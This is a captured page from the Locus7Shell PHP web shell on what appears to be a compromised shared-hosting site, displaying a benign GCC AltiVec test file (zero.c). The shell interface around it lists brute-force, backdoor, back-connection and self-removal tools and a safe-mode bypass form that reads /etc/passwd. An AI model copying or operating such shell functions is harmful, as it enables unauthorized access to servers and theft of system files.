Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/vmx/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     zero.c (4.12 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#include "harness.h"

vector signed short zs16() { return ((vector signed short){0,0,0,0,0,0,0,0}); }
vector signed short s16ss() { vector signed short a; return vec_subs(a,a); }
vector signed short s16s() { vector signed short a; return vec_sub(a,a); }
vector signed short s16x() { vector signed short a; return vec_xor(a,a); }
vector signed short s16a() { vector signed short a; return vec_andc(a,a); }

vector unsigned short zu16() { return ((vector unsigned short){0,0,0,0,0,0,0,0}); }
vector unsigned short u16ss() { vector unsigned short a; return vec_subs(a,a); }
vector unsigned short u16s() { vector unsigned short a; return vec_sub(a,a); }
vector unsigned short u16x() { vector unsigned short a; return vec_xor(a,a); }
vector unsigned short u16a() { vector unsigned short a; return vec_andc(a,a); }

vector signed int zs32() { return ((vector signed int){0,0,0,0}); }
vector signed int s32ss() { vector signed int a; return vec_subs(a,a); }
vector signed int s32s() { vector signed int a; return vec_sub(a,a); }
vector signed int s32x() { vector signed int a; return vec_xor(a,a); }
vector signed int s32a() { vector signed int a; return vec_andc(a,a); }

vector unsigned int zu32() { return ((vector unsigned int){0,0,0,0}); }
vector unsigned int u32ss() { vector unsigned int a; return vec_subs(a,a); }
vector unsigned int u32s() { vector unsigned int a; return vec_sub(a,a); }
vector unsigned int u32x() { vector unsigned int a; return vec_xor(a,a); }
vector unsigned int u32a() { vector unsigned int a; return vec_andc(a,a); }

vector signed char zs8() { return ((vector signed char){0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}); }
vector signed char s8ss() { vector signed char a; return vec_subs(a,a); }
vector signed char s8s() { vector signed char a; return vec_sub(a,a); }
vector signed char s8x() { vector signed char a; return vec_xor(a,a); }
vector signed char s8a() { vector signed char a; return vec_andc(a,a); }

vector unsigned char zu8() { return ((vector unsigned char){0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}); }
vector unsigned char u8ss() { vector unsigned char a; return vec_subs(a,a); }
vector unsigned char u8s() { vector unsigned char a; return vec_sub(a,a); }
vector unsigned char u8x() { vector unsigned char a; return vec_xor(a,a); }
vector unsigned char u8a() { vector unsigned char a; return vec_andc(a,a); }

vector pixel zp16() { return ((vector pixel){0,0,0,0,0,0,0,0}); }

vector bool short zb16() { return ((vector bool short){0,0,0,0,0,0,0,0}); }

vector bool short b16x() { vector bool short a; return vec_xor(a,a); }
vector bool short b16a() { vector bool short a; return vec_andc(a,a); }
vector bool int zb32() { return ((vector bool int){0,0,0,0}); }

vector bool int b32x() { vector bool int a; return vec_xor(a,a); }
vector bool int b32a() { vector bool int a; return vec_andc(a,a); }
vector bool char zb8() { return ((vector bool char){0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}); }

vector bool char b8x() { vector bool char a; return vec_xor(a,a); }
vector bool char b8a() { vector bool char a; return vec_andc(a,a); }

static void test()
{
  static vector unsigned int zerov;
#define zcheck(val, tag) \
  check(vec_all_eq((vector unsigned int)(val), zerov), tag)
  
  zcheck(zs16(), "zs16");
  zcheck(s16ss(), "s16ss");
  zcheck(s16s(), "s16s");
  zcheck(s16x(), "s16x");
  zcheck(s16a(), "s16a");
  zcheck(zu16(), "zu16");
  zcheck(u16ss(), "u16ss");
  zcheck(u16s(), "u16s");
  zcheck(u16x(), "u16x");
  zcheck(u16a(), "u16a");
  zcheck(zs32(), "zs32");
  zcheck(s32ss(), "s32ss");
  zcheck(s32s(), "s32s");
  zcheck(s32x(), "s32x");
  zcheck(s32a(), "s32a");
  zcheck(zu32(), "zu32");
  zcheck(u32ss(), "u32ss");
  zcheck(u32s(), "u32s");
  zcheck(u32x(), "u32x");
  zcheck(u32a(), "u32a");
  zcheck(zs8(), "zs8");
  zcheck(s8ss(), "s8ss");
  zcheck(s8s(), "s8s");
  zcheck(s8x(), "s8x");
  zcheck(s8a(), "s8a");
  zcheck(zu8(), "zu8");
  zcheck(u8ss(), "u8ss");
  zcheck(u8s(), "u8s");
  zcheck(u8x(), "u8x");
  zcheck(u8a(), "u8a");
  zcheck(zp16(), "zp16");
  zcheck(zb16(), "zb16");
  zcheck(b16x(), "b16x");
  zcheck(b16a(), "b16a");
  zcheck(zb32(), "zb32");
  zcheck(b32x(), "b32x");
  zcheck(b32a(), "b32a");
  zcheck(zb8(), "zb8");
  zcheck(b8x(), "b8x");
  zcheck(b8a(), "b8a");
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--